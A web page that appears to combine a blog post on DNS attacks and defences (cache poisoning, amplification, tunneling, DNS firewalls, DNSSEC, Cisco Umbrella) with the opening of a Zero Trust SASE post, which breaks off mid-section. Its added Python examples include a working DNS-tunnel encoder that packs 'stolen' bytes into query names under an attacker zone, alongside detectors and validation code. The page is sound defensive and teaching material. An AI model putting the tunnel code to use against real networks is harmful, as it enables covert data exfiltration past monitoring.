Bad actors take advantage of this and manipulate DNS to stage the Internet infrastructure that supports each stage of the kill chain. In many of today’s more sophisticated ransomware attacks, for example, bad actors use DNS responses to deliver malware components to a device.

Diagram: DNS security, DNS attacks, and DNS protection. Attack types shown: zero-day attacks, cache poisoning, denial of service and distributed denial of service, DNS amplification, fast-flux DNS.

Introduction to attacking DNS

The vulnerabilities and abuses of this protocol are extensive, and there are several methods of attacking DNS, for example DNS poisoning, denial of service, spoofing/hijacking, and DNS tunneling.

Unless you have DNS-layer security, the DNS packets that carry name-to-address lookups move through your network without being inspected. Additionally, most security solutions do not even register anomalous DNS activity such as DNS tunneling, a sure sign of an attack in progress. DNS tunneling uses the DNS protocol to carry non-DNS traffic over port 53: it sends HTTP(S) and other protocol traffic encoded inside DNS queries and responses.

An attacker establishes a DNS tunnel between their server and the victim’s machine. This covert connection allows the exfiltration of sensitive data and the execution of command and control operations.

DNS Poisoning 

DNS poisoning, or DNS cache poisoning, is where forged DNS data is inserted into a DNS resolver’s cache, causing the resolver to return an incorrect IP address for a domain. Rather than reaching the intended website, users are redirected, without their knowledge, to a malicious machine. More often than not this is a replica of the original site used for malicious purposes, such as distributing malware or harvesting login credentials.

DNS poisoning was first uncovered in 1998. Consider a recursive server sending a query out toward the root. Because DNS runs over UDP there is no connection, and back then the only thing that tied a response to its query was a 16-bit query ID, which is a very small space. That made it possible to trick a recursive resolver into storing incorrect DNS records, and once the nameserver has cached the wrong response it returns it to anyone who asks.

This “DNS poisoning” attack allows an attacker to deceive DNS and redirect web browsers to false servers, hijacking traffic. Furthermore, the incorrect entry remains until the cache entry expires, which depends on the TTL, so a single poisoning could lead to weeks of compromise.

Diagram: DNS poisoning.

So, not very long ago, if you flooded a recursive server with forged responses for a domain and brute-forced the query ID, you could eventually guess it and insert your response into that server’s cache.

If you set a long TTL on the forged record, such as a week, then everyone who queries that recursive server receives your chosen IP address for the domain name for that whole period. Today, changes have been made to mitigate DNS poisoning: resolvers randomize the UDP source port as well as the 16-bit query ID, and check that the response matches the outstanding question, so an attacker has to guess far more than 65,536 possibilities. It is much harder, but it can still happen, which is why DNSSEC validation is the real fix.
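To make the check concrete, here is an added example in Python that is not code from the page or from any resolver product. It builds and parses DNS messages in the RFC 1035 wire format and implements the acceptance test a recursive resolver applies to a UDP response: the transaction ID, the local port the query left from, the peer address and port, and the question section must all match an outstanding query, otherwise the datagram is ignored. The names, addresses (RFC 5737 documentation ranges) and the toy Resolver class are constructed; randomize_port=False reproduces the fixed-port behaviour of older resolvers, where the 16-bit ID was the only thing a spoofer had to guess.

```python
import os
import random
import struct

# Added example, not code from the page or any vendor: a minimal DNS wire-format
# builder/parser and the checks a recursive resolver must make before accepting a
# UDP response into its cache. All packets and addresses are constructed.

def encode_name(name):
    """Dotted name -> DNS labels (RFC 1035 section 3.1), terminated by the root label."""
    out = b""
    for label in name.rstrip(".").split("."):
        if not 1 <= len(label) <= 63:
            raise ValueError("bad label length")
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def decode_name(msg, offset):
    """Read a (possibly compressed) name; return (name with trailing dot, next offset)."""
    labels = []
    while True:
        length = msg[offset]
        if length == 0:
            return ".".join(labels) + ".", offset + 1
        if length & 0xC0 == 0xC0:                      # compression pointer
            ptr = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            tail, _ = decode_name(msg, ptr)
            return ".".join(labels + [tail.rstrip(".")]) + ".", offset + 2
        labels.append(msg[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length

def build_query(name, txid, qtype=1):
    """Standard recursive query; qtype 1 = A."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD=1
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)

def build_answer(name, txid, ip, ttl=300):
    """A response carrying one A record: what the authoritative server (or a spoofer) sends."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR=1 RD=1 RA=1
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(o) for o in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata  # owner = pointer to question
    return header + question + answer

def query_txid(packet):
    return struct.unpack("!H", packet[:2])[0]

def parse_response(msg):
    txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    qname, off = decode_name(msg, 12)
    qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
    off += 4
    answers = []
    for _ in range(an):
        _, off = decode_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            answers.append((".".join(str(b) for b in msg[off:off + 4]), ttl))
        off += rdlen
    return {"txid": txid, "flags": flags, "qname": qname, "qtype": qtype, "answers": answers}

class Resolver:
    """Toy recursive resolver. randomize_port=False mimics older resolvers that
    always sent from port 53, leaving only the 16-bit ID for a spoofer to guess."""

    def __init__(self, randomize_port=True):
        self.randomize_port = randomize_port
        self.pending = {}   # (local port, txid) -> (qname, server ip)
        self.cache = {}     # qname -> (ip, ttl)

    def send_query(self, name, server):
        qname = name.rstrip(".").lower() + "."
        txid = struct.unpack("!H", os.urandom(2))[0]
        port = random.randint(1024, 65535) if self.randomize_port else 53
        self.pending[(port, txid)] = (qname, server)
        return build_query(qname, txid), port

    def receive(self, packet, src_ip, src_port, dst_port):
        """Accept a response only if every field the resolver can check matches an
        outstanding query: local port, TXID, peer address and port, question, QR bit."""
        resp = parse_response(packet)
        key = (dst_port, resp["txid"])
        if key not in self.pending:
            return False
        qname, server = self.pending[key]
        if (src_ip, src_port) != (server, 53) or resp["qname"].lower() != qname \
                or not resp["flags"] & 0x8000:
            return False
        del self.pending[key]                       # one answer per question
        for ip, ttl in resp["answers"]:
            self.cache[qname] = (ip, ttl)
        return True

def guesses_needed(randomize_port):
    """Size of the space a blind spoofer must search per outstanding query."""
    return 65536 * ((65535 - 1024 + 1) if randomize_port else 1)
```

guesses_needed() shows why source-port randomization mattered: a blind spoofer goes from 65,536 candidates per query to roughly four billion. It is still a race against the genuine answer rather than a guarantee, and a spoofer who can see the query (on-path) needs no guessing at all, which is why DNSSEC validation remains the real fix.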

DNS Spoofing

Then we have DNS spoofing, or hijacking, which is very easy to do and difficult to detect. For example, say you mistype a domain name and try to go somewhere that does not exist, but instead of an error you land on a search page full of ads. This is the ISP hijacking NXDOMAIN responses: when you query a name that does not exist, the ISP sees this, crafts its own response, and sends you to a search page to sell you ads. The same thing commonly happens on public Wi-Fi networks.

DNS spoofing and DNS poisoning are similar attacks with distinguishable characteristics. Both attempt to trick users into revealing sensitive data and could result in the targeted user installing malicious software that is used later in the kill chain. Spoofing forges individual responses in transit; cache poisoning changes the entries stored on DNS resolvers or servers, so every later client of that resolver is affected.

DNS Amplification Attack (DNS Flood)

Then we have the DNS amplification style of attack, a form of reflected DDoS. A bad actor abuses open resolvers to turn small queries into much larger responses, which are directed at the victim’s hosts to bring them down.

Because DNS uses UDP for transport, a bad actor can spoof the source address of a DNS request so that the response is delivered to any IP address of their choosing. They amplify the attack by choosing queries whose responses are much larger than the query packet. For example, spoofed lookups sent to open recursive servers can achieve a 25x to 40x amplification factor. Since the source IP of the bogus lookups is set to the victim’s address, the victim is overwhelmed by responses it never requested.

DNS Flood Attack

A DNS flood targets one or more DNS servers belonging to a given zone, attempting to impede the resolution of resource records of that zone and its sub-zones. This attack overwhelms the network capacity that connects the authoritative servers to the Internet.

Once the bandwidth is depleted with malicious traffic, legitimate traffic carrying DNS queries from legitimate sources cannot contact the authoritative servers. DNS flood attacks differ from DNS amplification attacks. Unlike DNS floods, DNS amplification attacks reflect and amplify traffic off unsecured DNS servers to hide the attack’s origin and increase its effectiveness.

Diagram: DNS Security Solutions and flood attacks.

Random Subdomain Attack

Random subdomain DDoS attacks have become popular in recent attacks, for instance the Mirai botnet attack on Dyn. In these DNS attacks, many queries are sent for a single or a few target domains, but each includes a randomly generated, nonexistent subdomain.

This denial of service attack hits a domain’s authoritative name servers with a flood of requests for random, nonexistent subdomains. The name servers become bogged down replying to these phony requests and cannot respond to legitimate queries. These attacks are also called NXDOMAIN attacks; because every name is unique, caching at the recursive resolvers in the path does not help, and they can suffer denial of service as well.

DNS Tunneling

Then we have DNS tunneling, mentioned briefly above. DNS tunneling is frequently used to deliver payloads encoded in DNS queries and responses, exfiltrate data, and carry command and control traffic: attackers encode SSH, TCP, or HTTP traffic, for example carrying malware or stolen information, inside DNS queries so that it passes undetected.

This allows the bad actor to exfiltrate sensitive data in small chunks inside DNS requests, bypassing security controls. Given the volume of DNS traffic a network typically sees, attackers can hide data theft easily.

The bad actor can tunnel standard protocols such as TCP or SSH inside DNS requests. Strictly speaking this is not an attack on DNS itself; it is malicious activity that uses DNS as a carrier to exfiltrate data.
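The following added Python example, which is not code from the page or from any vendor, demonstrates both the tunneling described here and the random-subdomain (NXDOMAIN) flood from the earlier section. The first half shows the client side of a simple tunnel: the payload is base32-encoded and split into subdomain labels under an attacker-controlled zone (t.example.net, an assumed name), and the attacker’s authoritative server reassembles it. The second half is the defender’s side: a detector over constructed resolver log lines that flags, per client and registered domain, either long, high-entropy subdomains (tunnel) or a stream of unique NXDOMAIN answers (random-subdomain flood). The thresholds are illustrative and would be tuned to your own traffic.

```python
import base64
import math
from collections import defaultdict

# Added example, not code from the page or any product. Part one: how a tunnel
# client smuggles bytes out in query names. Part two: a detector over resolver
# logs. Domains, client addresses and log lines are all constructed.

TUNNEL_DOMAIN = "t.example.net"      # assumed attacker-controlled zone

def tunnel_queries(payload, domain=TUNNEL_DOMAIN, chunk=30):
    """Client side: base32 the payload (DNS names are case-insensitive, so base64
    would not survive), split into label-sized chunks, prefix a sequence number."""
    data = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    return [f"{i}.{data[j:j + chunk]}.{domain}"
            for i, j in enumerate(range(0, len(data), chunk))]

def reassemble(queries, domain=TUNNEL_DOMAIN):
    """Server side (the attacker's authoritative server): strip the zone, reorder, decode."""
    parts = {}
    for q in queries:
        seq, data = q[: -len(domain) - 1].split(".", 1)
        parts[int(seq)] = data
    joined = "".join(parts[i] for i in sorted(parts)).upper()
    return base64.b32decode(joined + "=" * (-len(joined) % 8))

def shannon_entropy(s):
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def registered_domain(qname):
    """Crude: last two labels. Production code should use the Public Suffix List."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def detect_tunnels(log_lines, min_unique=8, max_sub_len=30, max_entropy=3.5, nx_ratio=0.8):
    """Group queries per (client, registered domain) and flag two patterns: long or
    high-entropy subdomains (tunnel) and a stream of unique NXDOMAINs (random-subdomain flood)."""
    stats = defaultdict(lambda: {"subs": set(), "n": 0, "nx": 0, "len": 0, "ent": 0.0})
    for line in log_lines:
        _ts, client, qname, _qtype, rcode = line.split()
        qname = qname.rstrip(".")
        dom = registered_domain(qname)
        sub = qname[: -len(dom) - 1] if qname != dom else ""
        s = stats[(client, dom)]
        s["subs"].add(sub)
        s["n"] += 1
        s["nx"] += rcode == "NXDOMAIN"
        s["len"] += len(sub)
        s["ent"] += shannon_entropy(sub)
    verdicts = {}
    for key, s in stats.items():
        if len(s["subs"]) < min_unique:
            continue                                    # too few distinct names to judge
        if s["len"] / s["n"] > max_sub_len or s["ent"] / s["n"] > max_entropy:
            verdicts[key] = "tunnel"
        elif s["nx"] / s["n"] >= nx_ratio:
            verdicts[key] = "random-subdomain flood"
    return verdicts

# Constructed resolver log, one query per line: "timestamp client qname qtype rcode"
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z 10.0.0.5 www.example.com A NOERROR",
    "2024-05-01T10:00:02Z 10.0.0.5 mail.example.com MX NOERROR",
    "2024-05-01T10:00:03Z 10.0.0.5 cdn.example.com A NOERROR",
    "2024-05-01T10:00:04Z 10.0.0.5 api.example.com AAAA NOERROR",
    "2024-05-01T10:00:05Z 10.0.0.5 typo.example.com A NXDOMAIN",
]
# A tunnel session: 200 bytes of "stolen" data leaving as TXT queries from 10.0.0.7
SAMPLE_LOG += [f"2024-05-01T10:01:{i:02d}Z 10.0.0.7 {q} TXT NOERROR"
               for i, q in enumerate(tunnel_queries(bytes(range(200))))]
# A random-subdomain flood against victim.example from 10.0.0.9
SAMPLE_LOG += [f"2024-05-01T10:02:{i:02d}Z 10.0.0.9 {lbl}.victim.example A NXDOMAIN"
               for i, lbl in enumerate(["k3f9a", "q0x2z", "m7p1c", "b8r4t", "w2n6y",
                                        "j5h0e", "v9d3u", "g1s8l", "c6a2o", "z4t7i"])]
```

Running detect_tunnels(SAMPLE_LOG) flags 10.0.0.7 against example.net as a tunnel and 10.0.0.9 against victim.example as a random-subdomain flood, while the handful of ordinary lookups from 10.0.0.5 never reaches the minimum number of distinct names and is left alone. In a real deployment the per-domain statistics would be kept over a sliding window, and the registered-domain split would use the Public Suffix List so that a CDN’s many hostnames are not mistaken for a tunnel.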

Diagram: DNS Tunneling.

DNS Security Cisco

Cisco Umbrella DNS: The DNS Firewall

There are several ways these attacks can be prevented. Firstly, a DNS firewall provides DNS-layer security, which blocks malicious activity at the earliest possible point and, in the case of malware, contains callbacks to the attackers’ infrastructure. Products such as Cisco Umbrella DNS deliver this kind of DNS security solution.

DNS Security Cisco with DNS-layer security

Cisco Umbrella DNS applies DNS-layer security across the Internet’s infrastructure to block malicious and unwanted domains before a connection is established, as part of recursive DNS resolution. In addition, it uses a selective proxy that redirects requests for domains flagged as risky for deeper and more thorough inspection.

Cisco Umbrella DNS does this transparently through the DNS response, without adding latency or degrading performance. Just as a conventional firewall watches incoming and outgoing traffic and blocks unsafe connections, a DNS firewall works the same way; the distinction is that a DNS firewall analyzes and filters queries based on threat feeds and threat intelligence. There are two kinds of DNS firewalls: those for recursive servers and those for authoritative servers.

A DNS firewall provides several security services. It sits between a user’s recursive resolver and the authoritative nameserver of the website or service they are trying to reach, and that position lets it apply reputation filtering based on domain reputation.
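As an added example, not part of the page and not Cisco Umbrella’s code, the following Python evaluates a Response Policy Zone (RPZ), the open DNS-firewall mechanism used by recursive resolvers such as BIND. Policy is expressed as an ordinary DNS zone: each owner name is a domain (or wildcard) to act on, and the CNAME target encodes the action (NXDOMAIN, NODATA, pass-through, drop, or a rewrite to a sinkhole). The zone fragment, the rpz.example zone name, and the query names below are constructed, and only QNAME triggers are handled.

```python
# Added example, not code from the page or any vendor: a small RPZ (DNS firewall)
# policy evaluator. Owner names are relative to a constructed policy zone
# "rpz.example"; the CNAME target encodes the action:
#   CNAME .             -> answer NXDOMAIN
#   CNAME *.            -> answer NODATA (NOERROR, empty answer)
#   CNAME rpz-passthru. -> exempt from policy, resolve normally
#   CNAME rpz-drop.     -> drop the query, send no response
#   anything else       -> rewrite to that target (walled garden / sinkhole)
RPZ_ZONE = """
; constructed policy data, comments start with ';'
malware.example            CNAME .
*.malware.example          CNAME .
telemetry.adnet.example    CNAME *.
ok.adnet.example           CNAME rpz-passthru.
*.adnet.example            CNAME rpz-drop.
phish.example              CNAME sinkhole.corp.example.
*.phish.example            CNAME sinkhole.corp.example.
"""

SPECIAL_TARGETS = {".": "NXDOMAIN", "*.": "NODATA",
                   "rpz-passthru.": "PASSTHRU", "rpz-drop.": "DROP"}

def parse_rpz(text):
    """Return {owner: action}; action is a SPECIAL_TARGETS value or ('REDIRECT', target)."""
    rules = {}
    for line in text.splitlines():
        line = line.split(";")[0].strip()
        if not line:
            continue
        owner, rtype, target = line.split()
        if rtype != "CNAME":
            continue                         # this toy handles QNAME/CNAME triggers only
        rules[owner.lower()] = SPECIAL_TARGETS.get(target, ("REDIRECT", target.rstrip(".")))
    return rules

def lookup_policy(rules, qname):
    """Most specific rule wins: exact owner first, then the closest enclosing wildcard."""
    name = qname.rstrip(".").lower()
    if name in rules:
        return rules[name]
    labels = name.split(".")
    for i in range(1, len(labels)):
        wildcard = "*." + ".".join(labels[i:])
        if wildcard in rules:
            return rules[wildcard]
    return "PASSTHRU"                        # no rule: resolve normally

def apply_policy(rules, qname, upstream_answer):
    """What the resolver returns to the client. upstream_answer is the A record the
    resolver would otherwise have returned. None means the query is dropped."""
    action = lookup_policy(rules, qname)
    if action == "PASSTHRU":
        return {"rcode": "NOERROR", "answer": upstream_answer}
    if action == "NXDOMAIN":
        return {"rcode": "NXDOMAIN", "answer": None}
    if action == "NODATA":
        return {"rcode": "NOERROR", "answer": None}
    if action == "DROP":
        return None
    return {"rcode": "NOERROR", "answer": ("CNAME", action[1])}   # rewritten to sinkhole
```

The wildcard walk is what makes a feed of a few thousand malicious apex domains cover every hostname beneath them, and the explicit rpz-passthru entry shows how to carve out an exception without reordering rules. A production deployment also logs every policy hit, since the sinkhole traffic is exactly the evidence an incident responder wants.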

Cisco Umbrella DNS: Secure the channel

DNS over TLS (DoT) and DNS over HTTPS (DoH) are two standards for encrypting DNS queries so that third parties cannot read them; they add a secure layer on top of an insecure protocol. With DoH or DoT, users gain privacy for their DNS traffic and block eavesdropping on their requests, which would otherwise reveal the sites they visit. Both protect only the hop between the client and its resolver: the resolver itself still sees every query, so you must trust its operator, and the hop from the resolver to the authoritative servers is unchanged.

Cisco Umbrella DNS: Secure the protocol

Application-layer protocols use security extensions such as HTTPS and DMARC, and DNS should be no exception. DNS Security Extensions (DNSSEC) is a security protocol that defends against forged data by digitally signing DNS records so that their validity can be verified. The signing must happen at every level in the DNS lookup process, which can make it a complicated setup.

DNSSEC was one of the first protections to be worked on, and it is much older than many assume: the first discussions about DNSSEC took place in the early 1990s. It is a way to ensure that the record you get back has not been tampered with and that it was signed by the zone that owns the name, regardless of which server handed it to you. All of this is done with public-key cryptography.

Diagram: Cisco Umbrella DNS.

Public Key Infrastructure (PKI) 

Each zone has a public and private key pair: the private key signs the zone’s records, and the public key, published as a DNSKEY record, lets anyone verify those signatures. However, because DNS is a distributed hierarchy, we must also be able to trust that public key, so each zone’s key is vouched for by its parent, all the way up to the root. DNSSEC implements a hierarchical digital signing policy across all layers of DNS.

For example, in the case of a ‘google.com’ lookup, the root zone publishes and signs a DS record that identifies the .COM zone’s key, and the .COM zone publishes and signs a DS record that identifies google.com’s key, which in turn signs google.com’s records. A validating resolver needs only a trust anchor for the root key to verify the whole chain. DNSSEC not only lets a resolver verify the authenticity of the records it receives; it also allows an authenticated assertion of the non-existence of records (via NSEC/NSEC3).
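The parent-to-child link in that chain is mechanical and worth seeing in code. The following added Python example, which is not code from the page or from any DNS implementation, computes the two values a parent publishes about a child’s key, the key tag (RFC 4034 Appendix B) and the DS digest (RFC 4034 section 5, SHA-256 per RFC 4509), and checks that a DS record really vouches for a DNSKEY. The DNSKEY is a constructed 4-byte placeholder (real keys are far longer), the zone names are example names, and signature (RRSIG) verification, which needs an asymmetric-crypto library, is deliberately out of scope.

```python
import base64
import hashlib
import struct

# Added example, not code from the page: the DS -> DNSKEY link in the DNSSEC
# chain of trust. The key material below is a constructed placeholder.

def name_to_wire(name):
    """Canonical wire form (RFC 4034 section 6.2): lowercase labels, root label last."""
    out = b""
    for label in name.rstrip(".").lower().split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def dnskey_rdata(flags, protocol, algorithm, key):
    """DNSKEY RDATA: flags(2) protocol(1) algorithm(1) public key (base64 in presentation format)."""
    return struct.pack("!HBB", flags, protocol, algorithm) + base64.b64decode(key)

def key_tag(rdata):
    """RFC 4034 Appendix B key tag (all algorithms except the obsolete RSA/MD5)."""
    ac = 0
    for i, b in enumerate(rdata):
        ac += b << 8 if i % 2 == 0 else b
    ac += (ac >> 16) & 0xFFFF
    return ac & 0xFFFF

DIGESTS = {1: hashlib.sha1, 2: hashlib.sha256, 4: hashlib.sha384}

def ds_digest(owner, rdata, digest_type=2):
    """DS digest = H(canonical owner name || DNSKEY RDATA), as upper-case hex."""
    return DIGESTS[digest_type](name_to_wire(owner) + rdata).hexdigest().upper()

def ds_matches(owner, dnskey, ds):
    """Does the parent's DS record vouch for this child DNSKEY at this owner name?"""
    if not dnskey["flags"] & 0x0100:          # Zone Key flag (bit 7) must be set
        return False
    rdata = dnskey_rdata(**dnskey)
    if dnskey["algorithm"] != ds["algorithm"] or key_tag(rdata) != ds["key_tag"]:
        return False
    return ds_digest(owner, rdata, ds["digest_type"]) == ds["digest"].upper()

def chain_is_valid(chain):
    """chain: [(zone, dnskey, ds)] from the top down. For the root the DS is the
    resolver's configured trust anchor; for every other zone it is the DS record
    the parent published and signed. Each link must match, or nothing below it is trusted."""
    return all(ds_matches(zone, dnskey, ds) for zone, dnskey, ds in chain)

# Constructed child KSK (flags 257 = zone key + SEP) and the DS its parent would publish.
CHILD_KSK = {"flags": 257, "protocol": 3, "algorithm": 13, "key": "AQIDBA=="}
_rdata = dnskey_rdata(**CHILD_KSK)
PARENT_DS = {"key_tag": key_tag(_rdata), "algorithm": 13, "digest_type": 2,
             "digest": ds_digest("example.com", _rdata)}
```

Two details matter in practice. The owner name is part of the digest, so a DS for example.com cannot be reused to vouch for the same key at another name, and the key tag is only a hint for picking the right DNSKEY out of a set, never a substitute for the digest comparison. A real validator performs this check at every delegation from the trust anchor down, and additionally verifies the RRSIG over each DS and DNSKEY RRset.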

DNS resolvers can also be configured to provide security functions. For example, some resolvers provide content filtering, which blocks sites known to distribute malware and spam, and botnet protection, which blocks communication with known botnet infrastructure. Many of these secure DNS resolvers are free to use.

Summary: DNS Security Solutions

This blog post delved into DNS security solutions, exploring the key concepts, benefits, and best practices for safeguarding one’s online activities.

Section 1: Understanding DNS Security

The DNS, often called the Internet’s phonebook, translates domain names into IP addresses, allowing us to reach websites by typing familiar names instead of numbers. However, this critical system is susceptible to various security risks, such as DNS spoofing, cache poisoning, and DDoS attacks. Understanding these threats is crucial to appreciating the importance of DNS security solutions.

Section 2: DNS Security Solutions Explained

Several effective DNS security solutions are available to mitigate risks and fortify your online presence. Let’s explore a few key options:

  • DNS Filtering: This solution involves implementing content filtering policies to block access to malicious websites, reducing the likelihood of falling victim to phishing attempts and malware infections.
  • DNSSEC: Domain Name System Security Extensions (DNSSEC) provide cryptographic authentication and integrity verification of DNS data, preventing DNS spoofing and ensuring the authenticity of domain name resolutions.
  • Threat Intelligence Feeds: By subscribing to threat intelligence feeds, organizations can stay updated on emerging threats and proactively block access to malicious domains, bolstering their overall security posture.

Section 3: Benefits of DNS Security Solutions

Implementing robust DNS security solutions offers numerous benefits to individuals and organizations alike. Some notable advantages include:

– Enhanced Data Privacy: DNS security solutions protect sensitive user information, preventing unauthorized access or data breaches.

– Improved Network Performance: By filtering out malicious requests and blocking access to suspicious domains, DNS security solutions help optimize network performance and reduce potential downtime caused by cyberattacks.

– Mitigated Business Risks: By safeguarding your online infrastructure, DNS security solutions minimize the risk of reputational damage, financial loss, and legal repercussions due to cyber incidents.

Section 4: Best Practices for DNS Security

While investing in DNS security solutions is crucial, adopting best practices is equally important to maximize their effectiveness. Here are a few recommendations:

– Regularly update DNS software and firmware to ensure you benefit from the latest security patches and enhancements.

– Implement strong access controls and authentication mechanisms to prevent unauthorized access to DNS servers.

– Monitor DNS traffic for anomalies or suspicious activities, enabling prompt detection and response to potential security breaches.

Conclusion:

In an era where online threats continue to evolve, prioritizing DNS security is vital for individuals and organizations. By understanding the risks, exploring effective solutions, and implementing best practices, you can fortify your online security, safeguard your data, and confidently navigate the digital landscape.

Zero Trust SASE

In today's digital age, where remote work and cloud-based applications are becoming the norm, traditional network security measures are no longer sufficient to protect sensitive data. Enter Zero Trust Secure Access Service Edge (SASE), a revolutionary approach that combines the principles of Zero Trust security with the flexibility and scalability of cloud-based architectures.

In this blog post, we will delve into the concept of Zero Trust SASE and explore its benefits and implications for the future of network security.

Zero Trust is a security model that operates on "never trust, always verify." It assumes that no user or device should be granted automatic trust within a network, whether inside or outside the perimeter. Instead, every user, device, and application must be continuously authenticated and authorized based on various contextual factors, such as user behavior, device health, and location.

SASE is a comprehensive security framework that combines networking and security capabilities into a single cloud-based service. It aims to simplify and unify network security by providing secure access to applications and data, regardless of the user's location or device.

SASE integrates various security functions, such as secure web gateways, cloud access security brokers, and data loss prevention, into a single service, reducing complexity and improving overall security posture.

Table of Contents

Highlights: Zero Trust SASE

The Lag in Security 

Today’s digital transformation and strategy initiatives require speed and agility in IT. However, security lags behind: it can hold those initiatives back, or fail to align with the fluidity that agility requires. The result is a reduced security posture, which is a risk that must be managed. There is a lot to deal with: the rise in phishing attacks, mobile malware, fake public Wi-Fi networks, malicious apps, and data leaks.

The Role of New Security Requirements

These challenges have driven new security requirements. One is the critical capability to continuously discover, assess, and adapt to ever-changing risk and trust levels. These capabilities are bundled into a secure access service edge (SASE) solution, combining the SASE definition with zero trust network design in one SASE architecture.

Related: For pre-information, you may find the following helpful:

  1. SD-WAN SASE
  2. SASE Model
  3. SASE Solution
  4. Cisco Secure Firewall
  5. SASE Definition



SASE Architecture

Key Zero Trust SASE Discussion Points:


  • The rise of SASE.

  • Challenges to existing networking.

  • The misconception of Trust.

  • SASE definition and SASE architecture.

  • SASE requirements.

Back to Basics: Zero Trust SASE

The SASE Concept

Gartner coined the SASE concept after seeing a pattern emerge in cloud and SD-WAN projects where full security integration was needed. We now refer to SASE as a framework and a security best practice. SASE leverages multiple security services into a framework approach.

The idea of SASE was not far from what we already did by integrating multiple security solutions into a stack that ensured a comprehensive, layered, secure access solution. By calling it a SASE framework, the approach to a complete solution somehow felt more focused than what the industry recognized as a best security practice.

SASE Meaning

Main SASE Definition Components

SASE – Secure Access Service Edge

  • Network as a Service (NaaS)

  • Security as a Service (SECaaS)

  • Zero-Trust Architecture

  • Cloud-Native Architecture

The Benefits of Zero Trust SASE:

1. Enhanced Security: Zero Trust SASE ensures that only authorized users and devices can access sensitive resources, minimizing the risk of data breaches and insider threats. Organizations can mitigate the impact of compromised credentials and unauthorized access attempts by continuously verifying user identities and device health.

2. Scalability and Flexibility: With Zero Trust SASE, organizations can scale their security infrastructure dynamically based on their needs. SASE solutions can adapt to changing network demands as cloud-based services, providing secure access to applications and data from anywhere, anytime, and on any device.

3. Simplified Management: By consolidating multiple security functions into a single service, Zero Trust SASE simplifies security management and reduces operational overhead. Organizations can centrally manage and enforce security policies across their entire network, eliminating the need for multiple-point solutions and reducing complexity.

4. Improved User Experience: Zero Trust SASE eliminates the need for traditional VPNs and complex access control mechanisms. Users can securely access applications and data directly from the cloud without backhauling traffic to a central location. This improves performance and user experience, especially for remote and mobile users.

The Rise of SASE

The rise of SASE goes hand in hand with the zero trust security strategy. Security infrastructure and decisions must become continuous and adaptive rather than static, which was the basis of traditional security methods. Consequently, we must enable real-time decisions that balance risk, trust, and opportunity. Security has moved beyond a simple access control list (ACL) and zone-based segmentation on VLANs; in reality, there is no longer a single network point to act as an anchor for security.

Diagram: Zero Trust SASE: Digital transformation and strategy.

Zero Trust SASE: SASE Architecture

Many current network security designs and technologies were not designed to handle all the traffic and security threats we face today. This has forced many to adopt multiple-point products to address the different requirements. Remember that for every point product, there is an architecture to deploy, a set of policies to configure, and a bunch of logs to analyze.

I find correlating logs across multiple-point product solutions used in different domains hard. For example, a diverse team may operate the secure web gateways (SWG) to that of the virtual private network (VPN) appliances. It could be the case that these teams work in silos and are in different locations.

Challenges to existing networks

Existing networks and infrastructure present many challenges that create big security holes and decrease security posture. In reality, several IT components give an entity more access than required. Using IP addresses and static locations as a security anchor is a considerable flaw, and the virtual private network (VPN) and demilitarized zone (DMZ) architectures used to establish access are often configured to allow excessive implicit trust.

The issue with a DMZ

The DMZ is the neutral network between the Internet and your organization’s private network. It’s protected by a front-end firewall that limits Internet traffic to specific systems within its zone. The DMZ can have a significant impact on security if not appropriately protected. Remote access technologies such as VPN or RDP, often located in the DMZ, have become common targets of cyberattacks. One of the main issues I see with the DMZ is that the bad actors know it’s there. It may be secured, but it’s visible.

The issue with the VPN

In basic terms, a VPN provides an encrypted tunnel to a gateway and hides your IP address. However, the VPN does not secure users once they land on a network segment; it is based on coarse-grained access control where the user has access to entire network segments and subnets. Traditionally, once you are on a segment there is no intra-segment filtering. That assumes all users on the segment need the same security level and access to the same systems, which is not always the case.

Overly permissive network access

VPNs generally provide broad, overly permissive network access with only fundamental access control limits based on subnet ranges. So, the traditional VPN provides overly permissive access and security based on I.P. subnets.

Diagram: Security infrastructure: The issues.

SASE Architecture and Misconception of Trust 

Much of non-zero-trust security architecture is based on implicit trust, and bad actors abuse that trust. By contrast, a SASE architecture that includes zero trust networking and remote access as components can adaptively grant the level of trust required at the time, and nothing more.

It is like providing a narrow segmentation based on many contextual parameters continuously assessed for risk to ensure the users are who they are and that the entities, either internal or external to the network, are doing what they are supposed to do.

Removes excessive trust

A core feature of SASE and Zero Trust is that it removes the excessive trust once required to allow entities to connect and collaborate. Within a zero-trust environment, our implicit trust in traditional networks is replaced with explicit identity-based trust with a default denial. With an identity-based trust solution, we are not just looking at IP addresses to determine trust levels. After all, they are just binary, deemed a secure private or a less trustworthy public. This assumption is where all of our problems started. They are just ones and zeros.

Zero Trust concept: Proxy for trust

To improve your security posture, it would be best to stop relying primarily on IP addresses and network locations as a proxy for trust. We have been doing this for decades. There is minimal context to place a policy with the legacy constructs. To determine the trust of a requesting party, we need to examine multiple contextual aspects, not just IP addresses.

And the contextual aspects are continuously assessed for security posture. This is a much better way to manage risk and allows you to look at the entire picture before deciding to enter the network or access a resource.

Diagram: Zero Trust requirements. Lockdown of trust and access

Challenging Environments

More outside than inside

